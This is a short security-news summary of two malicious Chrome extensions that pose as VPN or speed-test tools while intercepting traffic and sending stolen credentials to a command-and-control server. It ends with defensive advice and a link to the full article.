Cybersecurity researchers have identified two malicious Google Chrome extensions that impersonate VPN services but are designed to intercept traffic and steal user credentials. These extensions perform man-in-the-middle attacks, exfiltrate data to command-and-control servers, and pose significant risks to users and organizations. #ChromeExtensions #ManInTheMiddleAttack
Keypoints
- The malicious extensions are marketed as network speed test tools but perform covert data interception.
- They inject hardcoded proxy credentials into authentication challenges to route traffic through attacker-controlled servers.
- The extensions monitor over 170 high-value domains, including cloud providers, social media, and adult sites.
- They continuously exfiltrate user credentials and session data via heartbeat messages to a C2 server.
- Users are advised to uninstall the extensions and organizations should implement extension allowlisting and network monitoring.
Read More: https://thehackernews.com/2025/12/two-chrome-extensions-caught-secretly.html